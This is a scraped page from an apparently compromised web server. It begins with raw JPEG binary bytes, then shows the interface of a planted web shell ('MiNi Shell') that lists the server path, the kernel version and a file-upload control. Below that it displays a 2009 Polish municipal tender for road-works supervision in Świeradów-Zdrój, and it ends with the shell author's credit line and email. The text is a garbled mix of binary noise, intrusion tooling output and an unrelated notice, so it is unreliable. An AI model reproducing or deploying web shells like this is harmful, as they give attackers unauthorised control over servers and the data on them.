JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/253128-N-2009.html

<p class="kh_header"><b>Świeradów-Zdrój: Pełnienie nadzoru inwestorskiego przy  zadaniu inwestycyjnym pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju</b><br>
<b>Numer ogłoszenia: 253128 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. Piłsudskiego 15, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7817601, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego przy  zadaniu inwestycyjnym pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usługi  pn.: -Pełnienie nadzoru inwestorskiego przy  zadaniu inwestycyjnym pn. Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju-, w zakresie: branży drogowej, branży  sanitarnej i branży elektrycznej. Zadanie   inwestycyjne realizowane będzie  w ramach  umów, dotyczących następujących zadań:
CZĘŚĆ I  - Pełnienie nadzoru inwestorskiego przy  budowie nowej drogi gminnej od ul. Kardynała Stefana Wyszyńskiego z  łącznikiem do ul. Piastowskiej-

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
Budowa nowej drogi gminnej od ul. Kardynała Stefana Wyszyńskiego z łącznikiem do ul. Piastowskiej - ok. 532,05 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 697,00mb, słupy oświetleniowe - 25 kompletów, kanalizacja deszczowa - kanał główny o średnicy 200-300mm o długości ok. 482,10mb, przykanaliki o średnicy 150mm o długości ok. 65,90m)

CZĘŚĆ II:
Zadanie 1 - Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Adama Mickiewicza - 
Zadanie 2 - Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Górskiej-

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:

1. Przebudowa  ul. Adama Mickiewicza - ok. 340,20 m, wraz z infrastrukturą (kanalizacja deszczowa - kanał główny o średnicy 200mm o długości ok. 97,50mb, przykanaliki o średnicy 150mm o długości ok. 47,00m)
2.Przebudowa  ul. Górskiej - ok. 415,70 mb, wraz z infrastrukturą (kanalizacja deszczowa - przykanaliki o średnicy 150mm o długości ok. 44,45mb) 

CZĘŚĆ III:
Zadanie 1 -  Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Krótkiej-
Zadanie 2. - Pełnienie nadzoru inwestorskiego przy  przebudowie ul. Górskiej-

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
1. Przebudowa  ul. Krótkiej - ok. 131,45 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 153,00mb, słupy oświetleniowe - 6 kompletów, kanalizacja deszczowa - kanał główny o średnicy 600mm o długości ok. 121,00mb, przykanaliki o średnicy 150mm o długości ok. 34,70mb) 
2. Przebudowa  ul. Górskiej - ok. 196,00 mb, wraz z infrastrukturą (kanalizacja deszczowa - przykanaliki o średnicy 150mm o długości ok. 22,55mb) 

CZĘŚĆ IV:
Zadanie 1 - Pełnienie nadzoru inwestorskiego przy  przebudowie ul. Wczasowej-
Zadanie 2 - Pełnienie nadzoru inwestorskiego przy  przebudowie  ul. Sienkiewicza-

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
1. Przebudowa  ul. Wczasowej - ok. 306,30 mb, wraz z infrastrukturą (kanalizacja deszczowa - kanał główny o średnicy 200mm o długości ok. 140,00mb, przykanaliki o średnicy 150mm o długości ok. 28,80mb) 
2. Przebudowa  ul. Sienkiewicza - ok. 340,20 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 120,00mb, słupy oświetleniowe - 3 komplety, kanalizacja deszczowa - kanał główny o średnicy 315-600mm o długości ok. 372,00mb, przykanaliki o średnicy 150mm o długości ok. 180,00mb) 

CZĘŚĆ V:
 Zadanie 1 - Pełnienie nadzoru inwestorskiego przy  przebudowie   ul. 3-go Maja-
Zadanie 2 - Pełnienie nadzoru inwestorskiego przy  przebudowie   ul. Zdrojowej -

Nadzór inwestorski na w/w części sprawowany będzie nad wykonywaniem robót budowlanych obejmujących:
1. Przebudowa  ul. 3-go Maja - ok. 177,15 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 212,00mb, słupy oświetleniowe - 8 kompletów, kanalizacja deszczowa - kanał główny o średnicy 200-300mm o długości ok. 147,10mb, przykanaliki o średnicy 150mm o długości ok. 29,80mb) 
2. Przebudowa  ul. Zdrojowej - ok. 170,00 mb, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 287,00mb, słupy oświetleniowe - 7 kompletów, kanalizacja deszczowa - kanał główny o średnicy 200mm o długości ok. 150,10mb, przykanaliki o średnicy 150mm o długości ok. 37,60mb) 

Zakres usługi  obejmuje pełny zakres czynności jaki dla inspektora nadzoru przewiduje ustawa z dnia 07.07.1994r. Prawo budowlane Dz. U. z 2006 Nr 156, poz. 1118 z późn. zm.). i będzie realizowany w branżach drogowej,  sanitarnej i elektrycznej. W przypadku niejasności w zakresie praw i obowiązków Zleceniobiorcy ustala się, iż celem niniejszej usługi jest stworzenie całościowego efektywnego systemu nadzoru inwestorskiego nad zadaniem inwestycyjnym pn.: - Poprawa  infrastruktury     drogowej  mającej na celu ułatwienie  dostępności  do infrastruktury turystycznej w  Świeradowie-Zdroju-. Zleceniobiorca podczas realizacji umowy zobowiązany jest do takiego działania na rzecz i w imieniu Zamawiającego, aby najkorzystniej zrealizować inwestycje tj. przy utrzymaniu standardów jakości działać na rzecz terminowego zakończenia realizacji inwestycji, w szczególności: 
a) reprezentowanie Zamawiającego na placu budowy poprzez sprawowanie kontroli zgodności realizacji zadania inwestycyjnego, z obowiązującymi przepisami i polskimi normami, zasadami wiedzy technicznej, z Dokumentacją Projektową, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, pozwoleniem na budowę, decyzją środowiskową, umową o dofinansowanie zawartą między Zamawiającym a Zarządem Województwa Dolnośląskiego, umowami o wykonanie robót budowlanych, dotyczącymi  części: I, II, III, IV, V zadania inwestycyjnego zawartymi pomiędzy Zamawiającym a Wykonawcami, 
b) sprawdzanie jakości wykonanych robót, wbudowanych wyrobów, a w szczególności zapobieganie stosowaniu wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie; wszelkie zastosowane materiały budowlane na zadaniu inwestycyjnym muszą być nowe oraz odpowiadać co do jakości wymaganiom określonym w ustawie z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. , Nr 92, poz. 881), a także wymaganiom jakościowym określonym w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych oraz Dokumentacji Projektowej.
c) koordynacja robót poszczególnych branż,
d) sprawdzanie i odbiór robót ulegających zakryciu lub zanikowi, uczestniczenie w próbach, badaniach, próbach technicznych sieci, instalacji, urządzeń technicznych i przewodów oraz przygotowanie i udział w czynnościach przekazania placu budowy, odbiorów częściowych i odbiorów  końcowych,
e) potwierdzenie faktycznie wykonanych robót, usunięcia wad oraz kontrolowanie rozliczeń budowy,
f) kontrola prawidłowości prowadzenia Dziennika Budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
g) rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót a w razie potrzeby zaciągania opinii autora projektu,
h) stwierdzanie gotowości do odbiorów robót zanikowych, odbiorów częściowych i końcowych wpisem do Dziennika Budowy oraz pisemne poinformowanie o tym fakcie Zamawiającego.
i) potwierdzanie faktycznie wykonanego zakresu robót jako podstawy do fakturowania częściowego zgodnie z postanowieniami umowy zawartej pomiędzy Zamawiającym a Wykonawcami,
j) sprawdzanie pod względem zasadności wykonania, obmiaru oraz kontroli merytorycznej i rachunkowej wycen robót dodatkowych/uzupełniających, przedstawianie do zatwierdzania protokołów konieczności robót dodatkowych/uzupełniających - wprowadzanie ich do realizacji po uzyskaniu akceptacji projektanta (rysunki zamienne lub wpis do Dziennika Budowy) i Zamawiającego (umowa na roboty dodatkowe/uzupełniające);kompletowanie protokołów nadzoru autorskiego, kompletowanie  dokumentacji z naniesionymi  poprawkami  projektanta na dokumentacje projektowe, kompletowanie protokołów odbioru robót zanikowych, prób technicznych, itp. wynikających z prawa budowlanego i norm branżowych,
k) składanie comiesięcznych raportów o stanie zaawansowania inwestycji  oraz występujących trudnościach w realizacji zadania inwestycyjnego i odstępstwach od umów zawartych przez Zamawiającego z Wykonawcami w terminie do 5 - go dnia miesiąca za miesiąc poprzedni,
l) przygotowanie w imieniu Zamawiającego kompletu dokumentów oraz złożenie zawiadomienia o zakończeniu budowy do Powiatowego Inspektora Nadzoru Budowlanego w Lubaniu i przekazanie kopii wniosku Zamawiającemu z potwierdzona datą wpływu PINB i oświadczeniem o przyjęciu go bez zastrzeżeń,
ł) przygotowanie oraz przedłożenie Zamawiającemu w terminie 15 dni od daty podpisania protokołu końcowego budowy sprawozdania końcowego z realizacji inwestycji zgodnie z załącznikiem nr 1,
m) uczestniczenie w przeglądach wynikłych z gwarancji i rękojmi w terminach 12, 24, 36 miesięcy od dnia rozpoczęcia okresów gwarancji i rękojmi,
n) obowiązkowy udział w cotygodniowych radach budowy,
o) jeżeli w okresie realizacji robót zajdzie uzasadniona konieczność wykonania robót uzupełniających/dodatkowych niezbędnych do prawidłowego wykonania przedmiotu umowy Zleceniobiorca powinien niezwłocznie zawiadomić o tym fakcie Zamawiającego. Pisemna zgoda Zamawiającego będzie podstawa wszczęcia postępowania, o którym mowa w art. 67 ust. 5 lub 6 ustawy Prawo zamówień publicznych i zawarcia stosownej umowy z Wykonawcą i wykonania robót uzupełniających/dodatkowych.
4. Obowiązki o których mowa w § 3 wykonywane będą poprzez pobyt koordynatora/inspektora nadzoru odpowiednio do potrzeb wynikających z toku budowy jednak nie rzadziej niż dwa razy w tygodniu w godzinach pracy Urzędu. Pobyt musi być udokumentowany wpisem do Dziennika Budowy.
5.W przypadku wystąpienia robót uzupełniających/dodatkowych obowiązkiem Zleceniobiorcy będzie pełnienie nadzoru zgodnie z obowiązkami przewidzianymi w niniejszej umowie bez odrębnego wynagrodzenia.

Wymagany okres gwarancji/rękojmi na wykonane usługi  wynosi 36 miesięcy od dnia  rozpoczęcia biegu terminu gwarancji ( zatwierdzenia przez Zamawiającego protokołu końcowego odbioru robót budowlanych i + 30 dni).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-0, 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy w niniejszym postępowaniu wymaga wniesienia wadium w wysokości 3 400,00 zł ( słownie: trzy tysiące czterysta złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
2. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
3. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
4. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP.
5. W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj.  

a) dysponuje osobą/ami posiadającą/ymi łącznie następujące kwalifikacje i uprawnienia:





aa1) uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, 


aa2) członkostwo i wymagane ubezpieczenie od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa.













aa3)  posiada
3 letnie doświadczenie w kierowaniu robotami drogowymi.

ab1)  uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych bez ograniczeń,




ab2)  członkostwo i wymagane ubezpieczenie od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa,


b) posiada niezbędną wiedzę i doświadczenie tj. 

ba) wykonał  jedną   
usługę  z zakresu  sprawowania nadzoru  inwestorskiego  przy zadaniu inwestycyjnym o wartości  robót min.1 000 000 zł, polegającym na budowie lub przebudowie drogi o nawierzchni bitumicznej 
lub
wykonał  jedną   
usługę  o wartości min. 20 000 zł  z zakresu  sprawowania nadzoru  inwestorskiego  przy zadaniu inwestycyjnym, polegającym na budowie lub przebudowie drogi o nawierzchni bitumicznej.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych 
2. Oświadczenie o spełnianiu warunków określonych w art. 24 ustawy Prawo Zamówień Publicznych
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
4. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert

5
a) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nie czynności lub pisemne zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, wykonawca wskazał osobę/y, którymi będzie dysponował.

aa1) decyzja o stwierdzeniu przygotowania zawodowego w zakresie kierowania robotami w specjalności drogowej bez ograniczeń, 

aa2) Zaświadczenie o członkostwie i wymaganym ubezpieczeniem od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa.

aa3) wymagany warunek spełni  wpisanie do wykazu osób o którym mowa w  pkt.5a osoby posiadającej min. 3 letnie doświadczenie w kierowaniu robotami drogowymi
ab1) Decyzja o stwierdzeniu przygotowania zawodowego w zakresie do kierowania robotami w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych bez ograniczeń,

ab2) zaświadczenie o członkostwie i wymaganym ubezpieczeniu od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa,

ba) Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartościom usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, oraz daty i miejsca wykonania wraz załączeniem dokumentów w formie referencji potwierdzających, że usługi te zostały wykonane należycie. Z przedłożonych referencji winno jasno wynikać: w jakim okresie prowadzone były prace , jaki obejmowały zakres w szczególności ich  wartość  oraz potwierdzenie, że  prace zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um-swieradow.bip.pbox.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miejska Świeradó-Zdrój
ul. 11- go Listopada 35
59-850 Świeradów-Zdrój
pokój nr 21a.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 12:00, miejsce: Gmina Miejska Świeradó-Zdrój
ul. 11- go Listopada 35
59-850 Świeradów-Zdrój
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  współfinansowany przez Unię Europejską środków Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013

Creat By MiNi SheLL
Email: jattceo@gmail.com